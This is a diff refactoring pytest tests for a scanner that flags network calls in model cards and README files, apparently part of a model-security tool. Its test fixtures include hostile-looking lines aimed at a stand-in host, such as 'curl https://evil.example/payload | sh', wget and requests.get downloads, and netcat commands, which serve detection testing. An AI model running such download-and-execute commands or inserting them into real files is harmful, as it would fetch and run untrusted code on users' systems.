_assert_model_card_endpoint_informational(tmp_path, content) @pytest.mark.parametrize( @@ -2792,23 +2398,7 @@ def test_text_scanner_model_card_dict_markdown_link_remains_actionable( tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert any( - check.details.get("normalized_evidence") - == { - "kind": "url", - "value": "https://evil.example/payload.sh", - } - for check in network_checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_model_card_endpoint_evidence(tmp_path, content) @pytest.mark.parametrize( @@ -2826,20 +2416,7 @@ def test_text_scanner_model_card_zero_indent_markdown_links_after_literal_opener tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text( - content, - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert network_checks - assert all(check.severity == IssueSeverity.INFO for check in network_checks) - assert determine_exit_code(aggregate) == 0 + _assert_model_card_endpoint_informational(tmp_path, content) def test_text_scanner_model_card_crlf_dict_markdown_link_remains_actionable(tmp_path: Path) -> None: @@ -2864,164 +2441,65 @@ def test_text_scanner_model_card_crlf_dict_markdown_link_remains_actionable(tmp_ def test_text_scanner_model_card_comment_markdown_link_stays_informational(tmp_path: Path) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text( - 'payloads = {} # "[download](https://evil.example/payload.sh)"\n', - encoding="utf-8", + _assert_model_card_endpoint_informational( + tmp_path, 'payloads = {} # "[download](https://evil.example/payload.sh)"\n' ) - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert network_checks - assert all(check.severity == IssueSeverity.INFO for check in network_checks) - assert determine_exit_code(aggregate) == 0 - def test_text_scanner_model_card_bibliography_url_field_is_informational(tmp_path: Path) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text( - "@misc{whisper,\n" - " title = {Whisper},\n" - " url = {https://arxiv.org/abs/2212.04356},\n" - " copyright = {arXiv.org perpetual, non-exclusive license},\n" - "}\n", - encoding="utf-8", + _assert_bibliography_informational( + tmp_path, + ( + "@misc{whisper,\n" + " title = {Whisper},\n" + " url = {https://arxiv.org/abs/2212.04356},\n" + " copyright = {arXiv.org perpetual, non-exclusive license},\n" + "}\n" + ), ) - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = [ - check - for check in result.checks - if check.name == "Network Communication Detection" and check.status == CheckStatus.FAILED - ] - - assert network_checks - assert all(check.severity == IssueSeverity.INFO for check in network_checks) - assert determine_exit_code(aggregate) == 0 - def test_text_scanner_model_card_single_line_bibliography_url_field_is_informational(tmp_path: Path) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text( - "@misc{whisper, title = {Whisper}, url = {https://arxiv.org/abs/2212.04356}}\n", - encoding="utf-8", + _assert_bibliography_informational( + tmp_path, ("@misc{whisper, title = {Whisper}, url = {https://arxiv.org/abs/2212.04356}}\n") ) - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = [ - check - for check in result.checks - if check.name == "Network Communication Detection" and check.status == CheckStatus.FAILED - ] - assert network_checks - assert all(check.severity == IssueSeverity.INFO for check in network_checks) - assert determine_exit_code(aggregate) == 0 +def test_text_scanner_model_card_quoted_bibliography_url_field_is_informational(tmp_path: Path) -> None: + _assert_bibliography_informational( + tmp_path, ('@misc{whisper,\n title = {Whisper},\n url = "https://arxiv.org/abs/2212.04356",\n}\n') + ) -def test_text_scanner_model_card_quoted_bibliography_url_field_is_informational(tmp_path: Path) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text( - '@misc{whisper,\n title = {Whisper},\n url = "https://arxiv.org/abs/2212.04356",\n}\n', - encoding="utf-8", +def test_text_scanner_model_card_markdown_table_links_with_parenthetical_text_are_informational( + tmp_path: Path, +) -> None: + _assert_bibliography_informational( + tmp_path, + ( + "| Dataset | Paper |\n" + "| --- | --- |\n" + "| AllNLI ([SNLI](https://nlp.stanford.edu/projects/snli/) and " + "[MultiNLI](https://cims.nyu.edu/~sbowman/multinli/)) | " + "[paper](https://doi.org/10.18653/v1/d15-1075) |\n" + ), ) - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = [ - check - for check in result.checks - if check.name == "Network Communication Detection" and check.status == CheckStatus.FAILED - ] - - assert network_checks - assert all(check.severity == IssueSeverity.INFO for check in network_checks) - assert determine_exit_code(aggregate) == 0 - - -def test_text_scanner_model_card_markdown_table_links_with_parenthetical_text_are_informational( - tmp_path: Path, -) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text( - "| Dataset | Paper |\n" - "| --- | --- |\n" - "| AllNLI ([SNLI](https://nlp.stanford.edu/projects/snli/) and " - "[MultiNLI](https://cims.nyu.edu/~sbowman/multinli/)) | " - "[paper](https://doi.org/10.18653/v1/d15-1075) |\n", - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = [ - check - for check in result.checks - if check.name == "Network Communication Detection" and check.status == CheckStatus.FAILED - ] - - assert network_checks - assert all(check.severity == IssueSeverity.INFO for check in network_checks) - assert determine_exit_code(aggregate) == 0 - def test_text_scanner_model_card_unclosed_bibliography_does_not_suppress_endpoint_code( tmp_path: Path, ) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text( - '@misc{paper,\n title = {Reference}\nendpoint = "https://evil.example/payload.sh"\n', - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert any( - check.details.get("normalized_evidence") - == { - "kind": "url", - "value": "https://evil.example/payload.sh", - } - for check in network_checks + _assert_model_card_endpoint_evidence( + tmp_path, ('@misc{paper,\n title = {Reference}\nendpoint = "https://evil.example/payload.sh"\n') ) - assert determine_exit_code(aggregate) == 1 def test_text_scanner_model_card_unclosed_bibliography_does_not_suppress_quoted_url_code( tmp_path: Path, ) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text( - '@misc{paper,\n title = {Reference}\nurl = "https://evil.example/payload.sh"\n', - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert any( - check.details.get("normalized_evidence") - == { - "kind": "url", - "value": "https://evil.example/payload.sh", - } - for check in network_checks + _assert_model_card_endpoint_evidence( + tmp_path, ('@misc{paper,\n title = {Reference}\nurl = "https://evil.example/payload.sh"\n') ) - assert determine_exit_code(aggregate) == 1 def test_text_scanner_model_card_dedup_bounds_repeated_documentation_links(tmp_path: Path) -> None: @@ -3065,14 +2543,7 @@ def test_text_scanner_generic_documentation_url_labels_are_informational( tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 0 + _assert_documentation_informational(tmp_path, content) @pytest.mark.parametrize( @@ -3087,19 +2558,7 @@ def test_text_scanner_generic_documentation_url_labels_are_informational( ], ) def test_text_scanner_python_definitions_with_urls_remain_actionable(tmp_path: Path, content: str) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "url_detected" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_documentation_network_actionable(tmp_path, content, "url_detected") @pytest.mark.parametrize( @@ -3111,30 +2570,13 @@ def test_text_scanner_python_definitions_with_urls_remain_actionable(tmp_path: P ], ) def test_text_scanner_passive_html_links_are_informational(tmp_path: Path, content: str) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 0 + _assert_documentation_informational(tmp_path, content) def test_text_scanner_executable_html_resource_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text('\n', encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "url_detected" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks + _assert_documentation_network_actionable( + tmp_path, '\n', "url_detected" ) - assert determine_exit_code(aggregate) == 1 @pytest.mark.parametrize( @@ -3146,25 +2588,15 @@ def test_text_scanner_executable_html_resource_remains_actionable(tmp_path: Path ], ) def test_text_scanner_documentation_block_comments_are_informational(tmp_path: Path, content: str) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + _assert_documentation_scan_informational(tmp_path, content) def test_text_scanner_code_after_closed_documentation_comment_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text( + _assert_documentation_scan_actionable( + tmp_path, '\nrequests.get("https://evil.example/payload")\n', - encoding="utf-8", ) - result = TextScanner().scan(str(text_path)) - - assert any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - @pytest.mark.parametrize("comment", ["", "/* requests.get(endpoint) */"]) def test_text_scanner_commented_occurrence_does_not_hide_later_network_call( @@ -3199,31 +2631,18 @@ def test_text_scanner_comment_delimiters_inside_strings_do_not_hide_code( tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - - assert any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + _assert_documentation_scan_actionable(tmp_path, content) def test_text_scanner_truncated_quote_state_does_not_hide_code(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text( - 'download("' + ("A" * (4096 + 4)) + '/* https://evil.example/payload")\n', - encoding="utf-8", + _assert_documentation_scan_actionable( + tmp_path, 'download("' + "A" * (4096 + 4) + '/* https://evil.example/payload")\n' ) - result = TextScanner().scan(str(text_path)) - - assert any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - def test_text_scanner_documentation_network_api_prose_is_informational(tmp_path: Path) -> None: text_path = tmp_path / "README.md" - text_path.write_text("Use requests.get to download weights.\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, "Use requests.get to download weights.\n") aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) assert any( @@ -3245,37 +2664,17 @@ def test_text_scanner_documentation_network_api_prose_is_informational(tmp_path: ], ) def test_text_scanner_network_api_string_literals_are_informational(tmp_path: Path, content: str) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "network_function" - and check.details.get("function") == "requests.get" - and check.severity == IssueSeverity.INFO - for check in result.checks - ) - assert determine_exit_code(aggregate) == 0 + _assert_network_info(tmp_path, content, ("network_function"), ("function"), ("requests.get")) def test_text_scanner_f_string_literal_network_api_text_is_informational(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text('message = f"Use requests.get to download weights"\n', encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "network_function" - and check.details.get("function") == "requests.get" - and check.severity == IssueSeverity.INFO - for check in result.checks + _assert_network_info( + tmp_path, + ('message = f"Use requests.get to download weights"\n'), + ("network_function"), + ("function"), + ("requests.get"), ) - assert determine_exit_code(aggregate) == 0 @pytest.mark.parametrize("prefix", ["f", "rf"]) @@ -3300,57 +2699,33 @@ def test_text_scanner_f_string_expression_network_calls_remain_actionable( def test_text_scanner_nested_network_api_call_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text('print(requests.get("https://evil.example/payload"))\n', encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "network_function" - and check.details.get("function") == "requests.get" - and check.severity == IssueSeverity.CRITICAL - for check in result.checks + _assert_nested_network_call( + tmp_path, + ('print(requests.get("https://evil.example/payload"))\n'), + ("network_function"), + ("function"), + ("requests.get"), ) - assert determine_exit_code(aggregate) == 1 def test_text_scanner_later_network_api_call_is_not_hidden_by_prose(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text( - 'Use requests.get to download weights.\nrequests.get("https://evil.example/payload")\n', - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "network_function" - and check.details.get("function") == "requests.get" - and check.severity == IssueSeverity.CRITICAL - for check in result.checks + _assert_nested_network_call( + tmp_path, + ('Use requests.get to download weights.\nrequests.get("https://evil.example/payload")\n'), + ("network_function"), + ("function"), + ("requests.get"), ) - assert determine_exit_code(aggregate) == 1 def test_text_scanner_documentation_network_library_prose_is_informational(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text("To use it, import requests before downloading weights.\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "network_library" - and check.details.get("library") == "requests" - and check.severity == IssueSeverity.INFO - for check in result.checks + _assert_network_info( + tmp_path, + ("To use it, import requests before downloading weights.\n"), + ("network_library"), + ("library"), + ("requests"), ) - assert determine_exit_code(aggregate) == 0 @pytest.mark.parametrize( @@ -3365,82 +2740,31 @@ def test_text_scanner_network_library_string_literals_are_informational( tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "network_library" - and check.details.get("library") == "requests" - and check.severity == IssueSeverity.INFO - for check in result.checks - ) - assert determine_exit_code(aggregate) == 0 + _assert_network_info(tmp_path, content, ("network_library"), ("library"), ("requests")) def test_text_scanner_imperative_network_import_prose_is_informational(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text("import requests before downloading weights.\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "network_library" - and check.details.get("library") == "requests" - and check.severity == IssueSeverity.INFO - for check in result.checks + _assert_network_info( + tmp_path, ("import requests before downloading weights.\n"), ("network_library"), ("library"), ("requests") ) - assert determine_exit_code(aggregate) == 0 def test_text_scanner_later_network_library_import_is_not_hidden_by_prose(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text( - "To use it, import requests before downloading weights.\nimport requests\n", - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "network_library" - and check.details.get("library") == "requests" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks + _assert_network_code_after_prose( + tmp_path, + ("To use it, import requests before downloading weights.\nimport requests\n"), + ("network_library"), + ("library"), + ("requests"), ) - assert determine_exit_code(aggregate) == 1 def test_text_scanner_python_prompt_import_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(">>> import socket\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "network_library" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_documentation_network_actionable(tmp_path, ">>> import socket\n", "network_library") def test_text_scanner_python_prompt_import_prose_remains_informational(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(">>> import socket for troubleshooting examples.\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + _assert_documentation_scan_informational(tmp_path, ">>> import socket for troubleshooting examples.\n") @pytest.mark.parametrize( @@ -3455,19 +2779,7 @@ def test_text_scanner_python_prompt_import_prose_remains_informational(tmp_path: ], ) def test_text_scanner_markdown_prefixed_imports_remain_actionable(tmp_path: Path, content: str) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "network_library" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_documentation_network_actionable(tmp_path, content, "network_library") @pytest.mark.parametrize( @@ -3479,14 +2791,7 @@ def test_text_scanner_markdown_prefixed_imports_remain_actionable(tmp_path: Path ], ) def test_text_scanner_markdown_prefixed_import_prose_is_informational(tmp_path: Path, content: str) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 0 + _assert_documentation_informational(tmp_path, content) @pytest.mark.parametrize( @@ -3510,72 +2815,31 @@ def test_text_scanner_executable_network_library_usage_remains_actionable( tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "network_library" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_documentation_network_actionable(tmp_path, content, "network_library") def test_text_scanner_semicolon_prose_network_import_is_informational(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text( - "For example; import socket for troubleshooting.\nFor example: import requests before use.\n", - encoding="utf-8", + _assert_documentation_informational( + tmp_path, "For example; import socket for troubleshooting.\nFor example: import requests before use.\n" ) - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 0 - def test_text_scanner_later_compound_network_import_is_not_hidden_by_prose(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text( + _assert_documentation_network_actionable( + tmp_path, "To use it, import requests before downloading weights.\nif enabled: import requests\n", - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "network_library" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks + "network_library", ) - assert determine_exit_code(aggregate) == 1 def test_text_scanner_earlier_network_library_call_is_not_hidden_by_later_prose(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text( - 'requests.request("GET", endpoint)\nTo use it, import requests before downloading weights.\n', - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "network_library" - and check.details.get("pattern") == "requests.request" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks + _assert_network_code_after_prose( + tmp_path, + ('requests.request("GET", endpoint)\nTo use it, import requests before downloading weights.\n'), + ("network_library"), + ("pattern"), + ("requests.request"), ) - assert determine_exit_code(aggregate) == 1 @pytest.mark.parametrize( @@ -3604,14 +2868,7 @@ def test_text_scanner_documentation_shell_substitution_remains_actionable( tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 1 + _assert_documentation_actionable(tmp_path, content) @pytest.mark.parametrize( @@ -3630,14 +2887,7 @@ def test_text_scanner_shell_interpreter_wrapper_prose_remains_informational( tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 0 + _assert_documentation_informational(tmp_path, content) @pytest.mark.parametrize( @@ -3703,20 +2953,7 @@ def test_text_scanner_shell_interpreter_wrapper_prose_remains_informational( ], ) def test_text_scanner_documentation_command_prefixes_remain_actionable(tmp_path: Path, content: str) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "url_detected" - and check.details.get("url") == "https://example.com/artifact" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_command_endpoint(tmp_path, content, ("https://example.com/artifact")) @pytest.mark.parametrize( @@ -3775,14 +3012,7 @@ def test_text_scanner_documentation_command_prefix_prose_remains_informational( tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 0 + _assert_documentation_informational(tmp_path, content) @pytest.mark.parametrize( @@ -3800,9 +3030,7 @@ def test_text_scanner_documentation_command_prefix_prose_remains_informational( ) def test_text_scanner_netcat_commands_remain_actionable(tmp_path: Path, content: str) -> None: text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, content) assert any( check.name == "Network Communication Detection" @@ -3817,21 +3045,11 @@ def test_text_scanner_netcat_commands_remain_actionable(tmp_path: Path, content: "content", ["1. curl https://evil.example/payload | sh\n", "2) wget https://evil.example/payload\n"] ) def test_text_scanner_ordered_list_shell_commands_remain_actionable(tmp_path: Path, content: str) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - - assert any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + _assert_documentation_scan_actionable(tmp_path, content) def test_text_scanner_ordered_list_shell_prose_remains_informational(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text("1. Use curl for downloading model files.\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + _assert_documentation_scan_informational(tmp_path, "1. Use curl for downloading model files.\n") @pytest.mark.parametrize("command", ["nc", "ncat", "netcat", "/usr/bin/nc", "nc.exe", "# nc"]) @@ -3857,17 +3075,7 @@ def test_text_scanner_documentation_netcat_destinations_remain_actionable( def test_text_scanner_documentation_netcat_prose_remains_informational(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text( - "The nc command is documented at https://docs.example.com/netcat.\n", - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 0 + _assert_documentation_informational(tmp_path, "The nc command is documented at https://docs.example.com/netcat.\n") @pytest.mark.parametrize( @@ -3900,9 +3108,7 @@ def test_text_scanner_explicit_network_commands_remain_actionable( destination: str, ) -> None: text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, content) aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) assert any( @@ -3933,26 +3139,14 @@ def test_text_scanner_privileged_documentation_downloads_remain_actionable( tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 1 + _assert_documentation_actionable(tmp_path, content) def test_text_scanner_privilege_wrapper_prose_remains_informational(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text( - "Use sudo -u nobody when curl access is required: https://docs.example.com/\n", encoding="utf-8" + _assert_documentation_scan_informational( + tmp_path, "Use sudo -u nobody when curl access is required: https://docs.example.com/\n" ) - result = TextScanner().scan(str(text_path)) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - @pytest.mark.parametrize( "content", @@ -3968,33 +3162,14 @@ def test_text_scanner_env_prefixed_documentation_downloads_remain_actionable( tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "url_detected" - and check.details.get("url") == "https://evil.example/payload" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_command_endpoint(tmp_path, content, ("https://evil.example/payload")) def test_text_scanner_env_prefixed_download_prose_remains_informational(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text( - "The HTTPS_PROXY setting helps curl users; see https://docs.example.com/proxy.\n", - encoding="utf-8", + _assert_documentation_scan_informational( + tmp_path, "The HTTPS_PROXY setting helps curl users; see https://docs.example.com/proxy.\n" ) - result = TextScanner().scan(str(text_path)) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - @pytest.mark.parametrize( "content", @@ -4029,47 +3204,17 @@ def test_text_scanner_documentation_package_install_urls_remain_actionable( tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "url_detected" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_documentation_network_actionable(tmp_path, content, "url_detected") def test_text_scanner_documentation_package_manager_prose_remains_informational(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text("Read the pip install guide at https://pip.pypa.io/en/stable/\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 0 + _assert_documentation_informational(tmp_path, "Read the pip install guide at https://pip.pypa.io/en/stable/\n") def test_text_scanner_go_install_domain_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text("go install evil.example/tool@latest\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "domain_name" - and check.details.get("domain") == "evil.example" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks + _assert_network_code_after_prose( + tmp_path, ("go install 